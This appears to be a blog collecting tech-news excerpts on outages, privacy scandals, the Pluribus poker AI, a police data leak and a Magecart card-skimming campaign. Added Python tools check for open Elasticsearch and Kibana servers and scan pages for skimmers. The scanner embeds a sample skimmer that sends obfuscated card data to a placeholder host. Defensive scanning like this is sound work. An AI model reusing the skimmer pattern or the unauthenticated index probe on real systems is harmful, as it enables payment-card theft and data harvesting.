Reddit Is Down as the Summer of Outages Continues

Users began to report outages a little over an hour ago. For this writer, the problem first presented as weirdness with Reddit’s login server and front page timeline, but it quickly worsened. Now navigating to reddit.com is rewarding many with 503 errors.

The outage seems to have hit users visiting Reddit on desktop the hardest. Navigating to Reddit through its app on Android and iOS worked just fine for several Gizmodo staffers, and even Reddit’s status page claims all systems are operational, though it is showing a sharp uptick in error rates for reddit.com.

Screenshot: Reddit Status Detector

If you feel like the internet has been breaking more than usual, you’re not alone. There have been a number of significant outages over the last month.

Google has had at least two major outages, as has Facebook. AT&T also experienced a major outage this month. Hell, even Down Detector has been down.

Source: Reddit Is Down as the Summer of Outages Continues

Microsoft stirs suspicions by adding telemetry spyware to security-only update

Under Microsoft’s rules, what it calls “Security-only updates” are supposed to include, well, only security updates, not quality fixes or diagnostic tools. Nearly three years ago, Microsoft split its monthly update packages for Windows 7 and Windows 8.1 into two distinct offerings: a monthly rollup of updates and fixes and, for those who want only those patches that are absolutely essential, a Security-only update package.

What was surprising about this month’s Security-only update, formally titled the “July 9, 2019—KB4507456 (Security-only update),” is that it bundled the Compatibility Appraiser, KB2952664, which is designed to identify issues that could prevent a Windows 7 PC from updating to Windows 10.

Among the fierce corps of Windows Update skeptics, the Compatibility Appraiser tool is to be shunned aggressively. The concern is that these components are being used to prepare for another round of forced updates or to spy on individual PCs. The word telemetry appears in at least one file, and for some observers it’s a short step from seemingly innocuous data collection to outright spyware.

My longtime colleague and erstwhile co-author, Woody Leonhard, noted earlier today that Microsoft appeared to be “surreptitiously adding telemetry functionality” to the latest update:

With the July 2019-07 Security Only Quality Update KB4507456, Microsoft has slipped this functionality into a security-only patch without any warning, thus adding the “Compatibility Appraiser” and its scheduled tasks (telemetry) to the update. The package details for KB4507456 say it replaces KB2952664 (among other updates).

Come on Microsoft. This is not a security-only update. How do you justify this sneaky behavior? Where is the transparency now?

I had the same question, so I spent the afternoon poking through update files and security bulletins and trying to get an on-the-record response from Microsoft. I got a terse “no comment” from Redmond.

Source: Microsoft stirs suspicions by adding telemetry files to security-only update | ZDNet

Once installed, a new scheduled task is added to the system under Microsoft > Windows > Application Experience.

Windows 10 SFC /scannow Can’t Fix Corrupted Files After Update

Starting today, Windows 10 users are finding that the sfc /scannow feature is no longer working and that it states it found, but could not fix, corrupted Windows Defender PowerShell files.

The Windows System File Checker tool, commonly known as SFC, has a /scannow argument that will check the integrity of all protected Windows system files and repair any issues that are found.

As of this morning, users in a wildersecurity.com thread have started reporting that when they run sfc /scannow, the program is stating that “Windows Resource Protection found corrupt files but was unable to fix some of them.” I too was able to reproduce this issue on a virtual machine with Windows Defender configured as the main antivirus program.

Source: Windows 10 SFC /scannow Can’t Fix Corrupted Files After Update

Apple removes Zoom’s dodgy hidden web server on your Mac without telling you – shows who really pwns your machine

Apple has pushed a silent update to Macs, disabling the hidden web server installed by the popular Zoom web-conferencing software.

A security researcher this week went public with his finding that the mechanism used to bypass a Safari prompt before entering a Zoom conference was a hidden local web server.

Jonathan Leitschuh focused largely on the fact that a user’s webcam would likely be ON automatically, meaning that a crafty bit of web coding would give an attacker a peek into your room if you simply visit their site.

But the presence of the web server was a more serious issue, especially since uninstalling Zoom did not remove it and the web server would reinstall the Zoom client – which is malware-like behaviour.

[…]

On 9 July the company updated its Mac app to remove the local web server “via a prompted update”.

The next day Apple itself took action, by instructing macOS’s built-in antivirus engine to remove the web server on sight from Macs. Zoom CEO Eric Yuan added on Wednesday:

Apple issued an update to ensure the Zoom web server is removed from all Macs, even if the user did not update their Zoom app or deleted it before we issued our July 9 patch. Zoom worked with Apple to test this update, which requires no user interaction.

Source: Wondering how to whack Zoom’s dodgy hidden web server on your Mac? No worries, Apple’s done it for you • The Register

Kind of scary that Apple can just go about removing software from your machine without any notification

Apple disables Walkie Talkie app due to vulnerability that could allow iPhone eavesdropping

Apple has disabled the Apple Watch Walkie Talkie app due to an unspecified vulnerability that could allow a person to listen to another customer’s iPhone without consent, the company told TechCrunch this evening.

Apple has apologized for the bug and for the inconvenience of being unable to use the feature while a fix is made.

[…]

Earlier this year a bug was discovered in the group calling feature of FaceTime that allowed people to listen in before a call was accepted. It turned out that the teen who discovered the bug, Grant Thompson, had attempted to contact Apple about the issue but was unable to get a response. Apple fixed the bug and eventually rewarded Thompson with a bug bounty. This time around, Apple appears to be listening more closely to the reports that come in via its vulnerability tips line and has disabled the feature.

Earlier today, Apple quietly pushed a Mac update to remove a feature of the Zoom conference app that allowed it to work around Mac restrictions to provide a smoother call initiation experience — but that also allowed emails and websites to add a user to an active video call without their permission.

Source: Apple disables Walkie Talkie app due to vulnerability that could allow iPhone eavesdropping | TechCrunch

‘Superhuman’ AI Crushes Poker Pros at Six-Player Texas Hold’em

Computer scientists have developed a card-playing bot, called Pluribus, capable of defeating some of the world’s best players at six-person no-limit Texas hold’em poker, in what’s considered an important breakthrough in artificial intelligence.

Two years ago, a research team from Carnegie Mellon University developed a similar poker-playing system, called Libratus, which consistently defeated the world’s best players at one-on-one Heads-Up, No-Limit Texas Hold’em poker. The creators of Libratus, Tuomas Sandholm and Noam Brown, have now upped the stakes, unveiling a new system capable of playing six-player no-limit Texas hold’em poker, a wildly popular version of the game.

In a series of contests, Pluribus handily defeated its professional human opponents, at a level the researchers described as “superhuman.” When pitted against professional human opponents with real money involved, Pluribus managed to collect winnings at an astounding rate of $1,000 per hour. Details of this achievement were published today in Science.

[…]

For the new study, Brown and Sandholm subjected Pluribus to two challenging tests. The first pitted Pluribus against 13 different professional players—all of whom have earned more than $1 million in poker winnings—in the six-player version of the game. The second test involved matches featuring two poker legends, Darren Elias and Chris “Jesus” Ferguson, each of whom was pitted against five identical copies of Pluribus.

The matches with five humans and Pluribus involved 10,000 hands played over 12 days. To incentivize the human players, a total of $50,000 was distributed among the participants, Pluribus included. The games were blind in that none of the human players were told who they were playing, though each player had a consistent alias used throughout the competition. For the tests involving a lone human and five Pluribuses, each player was given $2,000 for participating and a bonus $2,000 for playing better than their human cohort. Elias and Ferguson both played 5,000 separate hands against their machine opponents.

In all scenarios, Pluribus registered wins with “statistical significance,” and to a degree the researchers referred to as “superhuman.”

“We mean superhuman in the sense that it performs better than the best humans,” said Brown, who is completing his Ph.D. as a research scientist at Facebook AI. “The bot won by about five big blinds per hundred hands of poker (bb/100) when playing against five elite human professionals, which professionals consider to be a very high win rate. To beat elite professionals by that margin is considered a decisive win.”

[…]

Before the competition started, Pluribus developed its own “blueprint” strategy, which it did by playing poker with itself for eight straight days.

“Pluribus does not use any human gameplay data to form its strategy,” explained Brown. “Instead, Pluribus first uses self-play, in which it plays against itself over trillions of hands to formulate a basic strategy. It starts by playing completely randomly. As it plays more and more hands against itself, its strategy gradually improves as it learns which actions lead to winning more money. This is all done offline before ever playing against humans.”

Armed with its blueprint strategy, the competitions could begin. After the first bets were placed, Pluribus calculated several possible next moves for each opponent, in a manner similar to how machines play chess and Go. The difference here, however, is that Pluribus was not tasked to calculate the entire game, as that would be “computationally prohibitive,” as noted by the researchers.

“In Pluribus, we used a new way of doing search that doesn’t have to search all the way to the end of the game,” said Brown. “Instead, it can stop after a few moves. This makes the search algorithm much more scalable. In particular, it allows us to reach superhuman performance while only training for the equivalent of less than $150 on a cloud computing service, and playing in real time on just two CPUs.”

[…]

Importantly, Pluribus was also programmed to be unpredictable—a fundamental aspect of good poker gamesmanship. If Pluribus consistently bet tons of money when it figured it had the best hand, for example, its opponents would eventually catch on. To remedy this, the system was programmed to play in a “balanced” manner, employing a set of strategies, like bluffing, that prevented Pluribus’ opponents from picking up on its tendencies and habits.

Source: ‘Superhuman’ AI Crushes Poker Pros at Six-Player Texas Hold’em

Google admits leaked private voice conversations, decides to clamp down on whistleblowers, not improve privacy

Google admitted on Thursday that more than 1,000 sound recordings of customer conversations with the Google Assistant were leaked by some of its partners to a Belgian news site.

[…]

“We just learned that one of these language reviewers has violated our data security policies by leaking confidential Dutch audio data,” Google product manager of search David Monsees said in a blog post. “Our Security and Privacy Response teams have been activated on this issue, are investigating, and we will take action. We are conducting a full review of our safeguards in this space to prevent misconduct like this from happening again.”

Monsees said its partners only listen to “around 0.2 percent of all audio snippets” and said they are “not associated with user accounts,” even though VRT was able to figure out who was speaking in some of the clips.

Source: Google admits leaked private voice conversations

NB the CNBC article states that you can delete old conversations, but we know that’s not the case for transcribed Alexa conversations and we know that if you delete your shopping emails from Gmail, Google keeps your shopping history.

How American Corporations Are Policing Online Speech Worldwide

In the winter of 2010, a 19-year-old Moroccan man named Kacem Ghazzali logged into his email to find a message from Facebook informing him that a group he had created just a few days prior had been removed from the platform without explanation. The group, entitled “Jeunes pour la séparation entre Religion et Enseignement” (or “Youth for the separation of religion and education”), was an attempt by Ghazzali to organize with other secularist youth in the pious North African kingdom, but it was quickly thwarted. When Ghazzali wrote to Facebook to complain about the censorship, he found his personal profile taken down as well.

Back then, there was no appeals system, but after I wrote about the story, Ghazzali was able to get his accounts back. Others haven’t been so lucky. In the years since, I’ve heard from hundreds of activists, artists, and average folks who found their social media posts or accounts deleted—sometimes for violating some arcane proprietary rule, sometimes at the order of a government or court, other times for no discernible reason at all.

The architects of Silicon Valley’s big social media platforms never imagined they’d someday be the global speech police. And yet, as their market share and global user bases have increased over the years, that’s exactly what they’ve become. Today, the number of people who tweet is nearly the population of the United States. About a quarter of the internet’s total users watch YouTube videos, and nearly one-third of the entire world uses Facebook. Regardless of the intent of their founders, none of these platforms were ever merely a means of connecting people; from their early days, they fulfilled greater needs. They are the newspaper, the marketplace, the television. They are the billboard, the community newsletter, and the town square.

And yet, they are corporations, with their own speech rights and ability to set the rules as they like—rules that more often than not reflect the beliefs, however misguided, of their founders.

Source: How American Corporations Are Policing Online Speech Worldwide

T-Mobile Says Customers Can’t Sue Because It Violates Its ToS

T-Mobile screwed over millions of customers when it collected their geolocation data and sold it to third parties without their consent. Now, two of these customers are trying to pursue a class-action lawsuit against the company for the shady practice, but the telecom giant is using another shady practice to force them to settle their dispute behind closed doors.

On Monday, T-Mobile filed a motion to compel the plaintiffs into arbitration, which would keep the complaint out of a public courtroom. See, when you sign a contract or agree to a company’s terms of service with a forced arbitration clause, you are waiving your right to a trial by jury and oftentimes to pursue a class-action lawsuit at all. Settling a dispute in arbitration means having it heard by a third party behind closed doors. And an arbitration clause is buried in T-Mobile’s fine print.

T-Mobile’s terms of service state that customers do have the option to opt out of arbitration, which is buried within the agreement and states that they “must either complete the opt out form on this website or call toll-free 1-866-323-4405 and provide the information requested.” They also only have 30 days to do so after they have activated their service. After that brief time period, users are no longer eligible to opt out.

The plaintiffs, Shawnay Ray and Kantice Joyner of Maryland, filed the class-action complaint against T-Mobile in May. Verizon, Sprint, and AT&T were all also hit with lawsuits that same month for selling customer location data. “The telecommunications carriers are the beginning of a dizzying chain of data selling, where data goes from company to company, and ultimately ends up in the hands of literally anybody who is looking,” the complaint against T-Mobile states. The comment is largely referring to a Vice investigation that found that the phone carriers sold real-time location data to middlemen and that this data sometimes eventually ended up with bounty hunters.

Source: T-Mobile Says Customers Can’t Sue Because It Violates Its ToS

Google contractors are secretly listening to your Assistant and Home recordings

Not only is your Google Home device listening to you, a new report suggests there might be a Google contractor who’s listening as well. Even if you didn’t ask your device any questions, it’s still sending what you say to the company, who allow an actual person to collect data from it.

[…]

VRT, with the help of a whistleblower, was able to listen to some of these clips and subsequently heard enough to discern the addresses of several Dutch and Belgian people using Google Home — in spite of the fact some hadn’t even uttered the words “Hey Google,” which are supposed to be the device’s listening trigger.

The person who leaked the recordings was working as a subcontractor to Google, transcribing the audio files for subsequent use in improving its speech recognition. They got in touch with VRT after reading about Amazon Alexa keeping recordings indefinitely.

According to the whistleblower, the recordings presented to them are meant to be carefully annotated, with notes included about the speaker’s presumed identity and age. From the sound of the report, these transcribers have heard just about everything. Personal information? Bedroom activities? Domestic violence? Yes, yes, and yes.

While VRT only listened to recordings from Dutch and Belgian users, the platform the whistleblower showed them had recordings from all over the world – which means there are probably thousands of other contractors listening to Assistant recordings.

The VRT report states that the Google Home Terms of Service don’t mention that recordings might be listened to by other humans.

The report did say the company tries to anonymize the recordings before sending them to contractors, identifying them by numbers rather than user names. But again, VRT was able to pick up enough data from the recordings to find the addresses of the users in question, and even confront some of the users in the recordings – to their great dismay.

Google’s defense to VRT was that the company only transcribes and uses “about 0.2% of all audio clips,” to improve their voice recognition technology.

Source: Google contractors are secretly listening to your Assistant recordings

Prenda Law bosses in jail for seeding porn videos to d/l sites and then suing the downloaders

One of the former attorneys behind dodgy copyright-demand factory Prenda Law has been sentenced to 60 months in prison. Yes, the same Prenda Law that seeded file-sharing networks with smut flicks it owned the rights to in order to extract eye-watering copyright infringement settlements from downloaders.

Judge Joan Ericksen, of a US federal district court in Minnesota, on Tuesday this week handed down the five-year term, along with two years of supervised release and a $1,541,527.37 restitution bill, after Steele copped to one count each of conspiracy to commit money laundering and conspiracy to commit mail and wire fraud. While technically given two 60-month sentences, Steele, 48, is being allowed to serve both terms at the same time.

Steele, who has since been disbarred, admitted that from 2011 to 2014 he and co-conspirator Paul Hansmeier, operating as Prenda Law, set up a series of shell companies and studios that either purchased the rights to existing pornographic films or funded the making of original films with the intent of anonymously sticking the dirty movies on the Pirate Bay.

The duo then tracked down people who had downloaded the films and threatened them with copyright infringement suits unless the target agreed to pay out a $3,000 settlement. When the piracy scam started to flounder, the pair took things a step further by accusing targets of hacking their shell companies’ machines.

“To facilitate their phony ‘hacking’ lawsuits, the defendants recruited individuals who had been caught downloading pornography from a file-sharing website, to act as ruse ‘defendants’,” US prosecutors noted.

“These ruse defendants agreed to be sued and permit Steele and Hansmeier to conduct early discovery against their supposed ‘co-conspirators’ in exchange for Steele and Hansmeier waiving their settlement fees.”

Both lawyers would eventually be found out, and charged with fraud and money laundering for their roles in the scheme. By the time the operation was dismantled, it is estimated the duo was able to extort nearly $3m in payouts from randy web-surfers.

While five years behind bars can hardly be considered a slap on the wrist, Steele’s willingness to cooperate with authorities allowed him to win a considerably lighter term than his co-conspirator 37-year-old Hansmeier, who last month was sentenced to 14 years incarceration for convictions on the same set of charges. ®

Source: Prenda Law boss John Steele to miss 2020 Olympics… unless they show it in prison • The Register

AI Trained on Old Scientific Papers Makes Discoveries Humans Missed

In a study published in Nature on July 3, researchers from the Lawrence Berkeley National Laboratory used an algorithm called Word2Vec to sift through scientific papers for connections humans had missed. Their algorithm then spit out predictions for possible thermoelectric materials, which convert heat to energy and are used in many heating and cooling applications.

The algorithm didn’t know the definition of thermoelectric, though. It received no training in materials science. Using only word associations, the algorithm was able to provide candidates for future thermoelectric materials, some of which may be better than those we currently use.

[…]

To train the algorithm, the researchers assessed the language in 3.3 million abstracts related to materials science, ending up with a vocabulary of about 500,000 words. They fed the abstracts to Word2vec, which used machine learning to analyze relationships between words.

“The way that this Word2vec algorithm works is that you train a neural network model to remove each word and predict what the words next to it will be,” Jain said. “By training a neural network on a word, you get representations of words that can actually confer knowledge.”

Using just the words found in scientific abstracts, the algorithm was able to understand concepts such as the periodic table and the chemical structure of molecules. The algorithm linked words that were found close together, creating vectors of related words that helped define concepts. In some cases, words were linked to thermoelectric concepts but had never been written about as thermoelectric in any abstract they surveyed. This gap in knowledge is hard to catch with a human eye, but easy for an algorithm to spot.

After showing its capacity to predict future materials, researchers took their work back in time, virtually. They scrapped recent data and tested the algorithm on old papers, seeing if it could predict scientific discoveries before they happened. Once again, the algorithm worked.

In one experiment, researchers analyzed only papers published before 2009 and were able to predict one of the best modern-day thermoelectric materials four years before it was discovered in 2012.

This new application of machine learning goes beyond materials science. Because it’s not trained on a specific scientific dataset, you could easily apply it to other disciplines, retraining it on literature of whatever subject you wanted. Vahe Tshitoyan, the lead author on the study, says other researchers have already reached out, wanting to learn more.

“This algorithm is unsupervised and it builds its own connections,” Tshitoyan said. “You could use this for things like medical research or drug discovery. The information is out there. We just haven’t made these connections yet because you can’t read every article.”

Source: AI Trained on Old Scientific Papers Makes Discoveries Humans Missed – VICE

Scientists 3D-print human skin and bone for Mars astronauts

Scientists from the University Hospital of Dresden Technical University in Germany bio-printed skin and bone samples upside down to help determine if the method could be used in a low-gravity environment. It worked. ESA released videos of the printing in action.

The skin sample was printed using human blood plasma as a “bio ink.” The researchers added plant and algae-based materials to increase the viscosity so it wouldn’t just fly everywhere in low gravity.

“Producing the bone sample involved printing human stem cells with a similar bio-ink composition, with the addition of a calcium phosphate bone cement as a structure-supporting material, which is subsequently absorbed during the growth phase,” said Nieves Cubo, a bioprinting specialist at the university.

These samples are just the first steps for the ESA’s ambitious 3D bio-printing project, which is investigating what it would take to equip astronauts with medical and surgical facilities to help them survive and treat injuries on long spaceflights and on Mars.

“Carrying enough medical supplies for all possible eventualities would be impossible in the limited space and mass of a spacecraft,” said Tommaso Ghidini, head of ESA’s Structures, Mechanisms and Materials Division. “Instead, a 3D bioprinting capability will let them respond to medical emergencies as they arise.”

Source: Scientists 3D-print human skin and bone for Mars astronauts – CNET

Study finds that parental ‘memory’ is inherited across generations

“While neuronally encoded behavior isn’t thought to be inherited across generations, we wanted to test the possibility that environmentally triggered modifications could allow ‘memory’ of parental experiences to be inherited,” explains Julianna “Lita” Bozler, a Ph.D. candidate in the Bosco Lab at the Geisel School of Medicine, who served as lead author on the study.

When exposed to wasps—which deposit their eggs into and kill the larvae of fruit flies—Drosophila melanogaster females are known to shift their preference to food containing ethanol as an egg laying substrate, which protects their larvae from wasp infection.

For the study, the fruit flies were cohabitated with female wasps for four days before their eggs were collected. The embryos were separated into two cohorts—a wasp-exposed and unexposed (control) group—and developed to maturity without any contact with adult flies or wasps. One group was used to propagate the next generation and the other was analyzed for ethanol preference.

“We found that the original wasp-exposed flies laid about 94 percent of their eggs on ethanol food, and that this behavior persisted in their offspring, even though they’d never had direct interaction with wasps,” says Bozler.

The ethanol preference was less potent in the first-generation offspring, with 73 percent of their eggs laid on ethanol food. “But remarkably, this inherited ethanol preference persisted for five generations, gradually reverting back to a pre-wasp exposed level,” she says. “This tells us that inheritance of ethanol preference is not a permanent germline change, but rather a reversible trait.”

Importantly, the research team determined that one of the critical factors driving ethanol preference behavior is the depression of Neuropeptide-F (NPF) that is imprinted in a specific region of the female fly’s brain. While this change, based in part on visual signals, was required to initiate transgenerational inheritance, both male and female progeny were able to pass on preference to their offspring.

Source: Study finds that parental ‘memory’ is inherited across generations

Microsoft Action Pack software no longer for all sellers of MS products, reseller rebellion

More than 2,500 resellers and integrators have signed a petition opposing Microsoft’s intention to remove free software licences granted to members of the channel to run their business. The changes are described here:

Effective July 1, 2020, we will retire the internal use rights (IUR) association with the product licenses partners receive in the Microsoft Action Pack and included with a competency. Product license use rights will be updated to be used for business development scenarios such as demonstration purposes, solution/services development purposes, and internal training.

Beginning October 1, 2019, the product licenses included with competencies will be specific to the competency you attain. Please review the benefits you will receive with your competency in Partner Center at time of purchase. Additional licenses can be purchased through commercial licensing to run your business.

There are a huge number of partner resellers, most of them small businesses, who recommend, resell and support customers running Microsoft wares or services. In 2017, Microsoft said that “our partners employ more than 17 million people around the world”.

The barriers to entry are low and companies who sign up can qualify for a range of competencies, starting with an “Action Pack” subscription that comes with a wide range of benefits, such as five Office 365 seats, five Dynamics 365 licences, 2-core SQL Server, ten Windows 10 Enterprise packages, $100 per month Azure credit and so on. The Action Pack costs around £350 per year but represents excellent value if you would otherwise have to purchase the licences. The same is true of the higher levels, Silver and Gold competencies, which command a higher fee but provide a wider range of benefits.

Resellers are not allowed to resell these specific licences, but critically, they do allow use for “internal business purposes”. Smaller Microsoft channel firms have been able to operate their businesses, in large part, using these subsidised licences.

That offer is now ending. “We will retire product licenses for internal use purposes on July 1 2020,” stated the Microsoft Partner Network (MPN) guide.

There are more changes too, and none of them good for partners. Free support incidents are being withdrawn. “Starting August 2019, on-premise Product Support incidents will no longer be available for Action Pack and competencies,” warned Microsoft.

In addition, the matching of cloud benefits to specific competencies means reduced benefits. Dynamics 365 seats, for example, will now only be available to partners with the Cloud Business Applications Competency, instead of being doled out to all.

Source: Microsoft middlemen rebel against removal of free software licences • The Register

Over 90 Million Records Leaked by Chinese Public Security Department

A publicly accessible and unsecured ElasticSearch server owned by the Jiangsu Provincial Public Security Department of the Chinese province Jiangsu leaked two databases containing over 90 million people and business records.

Jiangsu (江苏省) is an eastern-central coastal Chinese province with a population of over 80 million and an urban population of more than 55 million accounting for 68.76% of its total population according to a 2018 population census from the National Bureau of Statistics, which makes it the fifth most populous province in China.

Provincial public security departments are “functional organization under the dual leadership of Provincial Government and the Ministry of Public Security in charge of the whole province’s public security work.”

The two now-secured databases contained more than 26 GB of data in the form of personally identifiable information (PII): names, birth dates, genders, identity card numbers and location coordinates, as well as city_relations, city_open_id and province_open_id fields for individuals.

In the case of businesses, the records included business IDs, business types, location coordinates, city_open_id, and memos designed to track if the owner of the business is known.

Besides the two exposed ElasticSearch databases, the Jiangsu Provincial Public Security Department also had a Public Security Network admin console that required a valid user/password combo for access, as well as a publicly-accessible Kibana installation running on the server which would help browse and analyze the stored data using a GUI-based interface.

However, unlike other cases of exposed Kibana installations, this one was not fully configured: once loaded in a web browser, it went straight to the “Create index pattern” page.
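A check for this class of exposure, added here as an example (it is not code from the report or from Elastic): it requests the index listing from an Elasticsearch host on port 9200 and the status endpoint of Kibana on port 5601 without any credentials and classifies the answers. The ports, the Kibana /api/status path and the sample response embedded so the classification runs offline are assumptions for the demo.

```python
"""Check whether an Elasticsearch (9200) or Kibana (5601) endpoint answers without credentials.

Added example, not code from the report or from Elastic. Ports, the Kibana path,
the host name and the sample response below are assumptions for the demo. Only
main() touches the network; the classify/triage functions run offline.
"""
import json
import sys
import urllib.error
import urllib.request

# Constructed sample of GET /_cat/indices?format=json from an open cluster (not real data).
SAMPLE_CAT_INDICES = json.dumps([
    {"health": "yellow", "status": "open", "index": "companies",
     "docs.count": "340", "store.size": "1.2mb"},
    {"health": "yellow", "status": "open", "index": "people",
     "docs.count": "1200", "store.size": "4.8mb"},
])


def fetch(url, timeout=5):
    """GET url with no credentials. Returns (status, body); status 0 means unreachable."""
    req = urllib.request.Request(url, headers={"User-Agent": "es-exposure-check/1.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:  # 401/403/404 etc. still carry a body
        return e.code, e.read().decode("utf-8", "replace")
    except (urllib.error.URLError, OSError) as e:
        return 0, str(e)


def classify_es_response(status, body):
    """Classify the reply to GET /_cat/indices?format=json.

    Returns (verdict, indices): verdict is 'open' (no auth, indices listed),
    'auth_required', 'unreachable', 'not_es' or 'error'; indices is a list of
    {'index', 'docs', 'size'} dicts, filled only when the cluster is open.
    """
    if status == 0:
        return "unreachable", []
    if status in (401, 403):
        return "auth_required", []
    if status != 200:
        return "error", []
    try:
        data = json.loads(body)
    except ValueError:
        return "not_es", []
    if not isinstance(data, list):
        return "not_es", []
    indices = []
    for entry in data:
        if not isinstance(entry, dict) or "index" not in entry:
            return "not_es", []
        indices.append({
            "index": entry["index"],
            "docs": int(entry.get("docs.count") or 0),
            "size": entry.get("store.size", "?"),
        })
    return "open", indices


def classify_kibana_response(status, body):
    """Classify the reply to GET /api/status on Kibana (path assumed)."""
    if status == 0:
        return "unreachable"
    if status in (401, 403):
        return "auth_required"
    try:
        data = json.loads(body)
    except ValueError:
        return "not_kibana"
    return "open" if status == 200 and isinstance(data, dict) and "status" in data else "not_kibana"


def triage(indices, top=5):
    """Largest indices first: what an attacker pulls first is what you assess first."""
    return sorted(indices, key=lambda i: i["docs"], reverse=True)[:top]


def main(host):
    status, body = fetch(f"http://{host}:9200/_cat/indices?format=json")
    verdict, indices = classify_es_response(status, body)
    print(f"elasticsearch {host}:9200 -> {verdict}")
    for idx in triage(indices):
        print(f"  {idx['index']:<30} docs={idx['docs']:<10} size={idx['size']}")
    status, body = fetch(f"http://{host}:5601/api/status")
    print(f"kibana {host}:5601 -> {classify_kibana_response(status, body)}")


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1")
```

Run it against a host you own; a verdict of “open” with a non-empty index list is exactly the state the report describes, and the doc counts tell you how much is at stake before anyone downloads it.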

Source: Over 90 Million Records Leaked by Chinese Public Security Department

Magento webshop Automated Magecart Campaign Hits Over 960 Breached Stores

A large-scale payment card skimming campaign that successfully breached 962 e-commerce stores was discovered today by Magento security research company Sanguine Security.

The campaign seems to be automated according to Sanguine Security researcher Willem de Groot who told BleepingComputer that the card skimming script was added within a 24-hour timeframe. “It would be nearly impossible to breach 960+ stores manually in such a short time,” he added.

Sanguine Security has not shared how such automated Magecart attacks against e-commerce websites would work, but the procedure would most likely entail scanning for and exploiting security flaws in the stores’ software platform.

“Have not gotten confirmation yet, but it seems that several victims were missing patches against PHP object injection exploits,” de Groot also said.

While details on how the online stores were breached are still scarce given that the logs are still being analyzed, the JavaScript-based payment data skimmer script was decoded and uploaded by the security company to GitHub Gist.

As shown from its source code, the skimmer was used by the attackers to collect e-commerce customers’ payment info on breached stores, including full credit card data, names, phones, and addresses.
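An added example, not Sanguine Security’s code and not the decoded skimmer from the Gist: a heuristic scan of a checkout page for a script that reads the card fields, hooks the payment form and ships the data to a host that is not the shop’s own, with \xHH-escaped field names resolved before matching, since that is how such scripts usually hide what they touch. The page, the field names and the hosts are constructed for the demo.

```python
"""Heuristic scan of a checkout page for injected card-skimming JavaScript.

Added example, not Sanguine Security's code and not the decoded skimmer. The
HTML below is constructed; the patterns are the traits the article attributes
to the skimmer (reads card fields, hooks the form, sends the data away) plus
the string obfuscation such scripts commonly use.
"""
import re
from urllib.parse import urlparse

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_RE = re.compile(r"""src\s*=\s*["']([^"']+)["']""", re.I)
URL_RE = re.compile(r"""https?://[^\s"'<>)]+""", re.I)
CARD_FIELDS = re.compile(r"cc_number|card[_-]?number|cardnumber|cc_cid|cvv|cvc|cc_exp|expir", re.I)
HOOKS = re.compile(r"""addEventListener\(\s*['"](submit|click|change|keyup)|\.onsubmit|\.onclick|setInterval\(""")
EXFIL = re.compile(r"XMLHttpRequest|fetch\(|sendBeacon|new Image\(|\.src\s*=")
HEX_RUN = re.compile(r"(\\x[0-9a-fA-F]{2}){8,}|(\\u00[0-9a-fA-F]{2}){8,}")
ENCODERS = re.compile(r"btoa\(|atob\(|String\.fromCharCode")


def deobfuscate(js):
    """Resolve \\xHH and \\uHHHH escapes so field names hidden in hex become searchable."""
    js = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), js)
    return re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), js)


def is_third_party(host, first_party):
    return bool(host) and host != first_party and not host.endswith("." + first_party)


def analyse_script(body, src, first_party):
    """Return (suspicious, indicators) for one <script> element."""
    plain = deobfuscate(body)
    indicators = []
    if CARD_FIELDS.search(plain):
        indicators.append("reads payment fields")
    if HOOKS.search(plain):
        indicators.append("hooks form/input events")
    if EXFIL.search(plain):
        indicators.append("sends data out")
    foreign = sorted({urlparse(u).hostname for u in URL_RE.findall(plain)
                      if is_third_party(urlparse(u).hostname, first_party)})
    for host in foreign:
        indicators.append("contacts " + host)
    if HEX_RUN.search(body) or ENCODERS.search(body):
        indicators.append("obfuscated or encoded")
    if src and is_third_party(urlparse(src).hostname, first_party):
        indicators.append("third-party src " + src)
    # A skimmer needs the card data and a way out; obfuscation on top is the usual tell.
    suspicious = "reads payment fields" in indicators and (
        "sends data out" in indicators or bool(foreign) or "obfuscated or encoded" in indicators)
    return suspicious, indicators


def scan(html, first_party):
    """Analyse every <script> on the page; one dict per script, in document order."""
    findings = []
    for n, m in enumerate(SCRIPT_RE.finditer(html)):
        attrs, body = m.group(1), m.group(2)
        src_m = SRC_RE.search(attrs)
        src = src_m.group(1) if src_m else None
        suspicious, indicators = analyse_script(body, src, first_party)
        findings.append({"index": n, "src": src, "suspicious": suspicious, "indicators": indicators})
    return findings


# Constructed checkout page: one first-party script, one benign inline script, one skimmer.
SAMPLE_HTML = r"""
<form id="co-payment-form"><input name="cc_number"><input name="cc_cid"></form>
<script src="https://cdn.example-shop.com/static/checkout.js"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag() { dataLayer.push(arguments); }
  gtag('js', new Date());
</script>
<script>
  var _0x4f = ["\x63\x63\x5f\x6e\x75\x6d\x62\x65\x72", "\x63\x63\x5f\x63\x69\x64"];
  document.getElementById("co-payment-form").addEventListener("submit", function () {
    var d = {};
    for (var i = 0; i < _0x4f.length; i++) { d[_0x4f[i]] = document.getElementsByName(_0x4f[i])[0].value; }
    new Image().src = "https://stats-collector.example.net/i.gif?d=" + btoa(JSON.stringify(d));
  });
</script>
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_HTML, "example-shop.com"):
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"script #{f['index']} src={f['src']} -> {flag}: {', '.join(f['indicators'])}")
```

This is a triage aid, not a verdict: a skimmer that splits its strings or loads its payload from a second stage will score lower, and a legitimate payment widget will score higher, so treat a hit as “read this script now” and compare it against the file in your repository.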

Source: Automated Magecart Campaign Hits Over 960 Breached Stores

Canon Stabs Tradition in the Back With Camera That Supports Vertical Video

Canon’s G7 X line has long been a favorite of photographers who wanted a travel-friendly camera that could still capture high-quality images. But with the rise of smartphones and the decline of point-and-shoots, Canon began pushing its compact cameras towards vloggers, who I’ve seen use cameras like the G7 X and Sony’s RX100 line as a backup or more portable alternative to a big mirrorless or DSLR cam. After all, when you’re attaching a camera to a gimbal or the end of a GorillaPod, every extra bit of lightness makes a camera easier to handle.

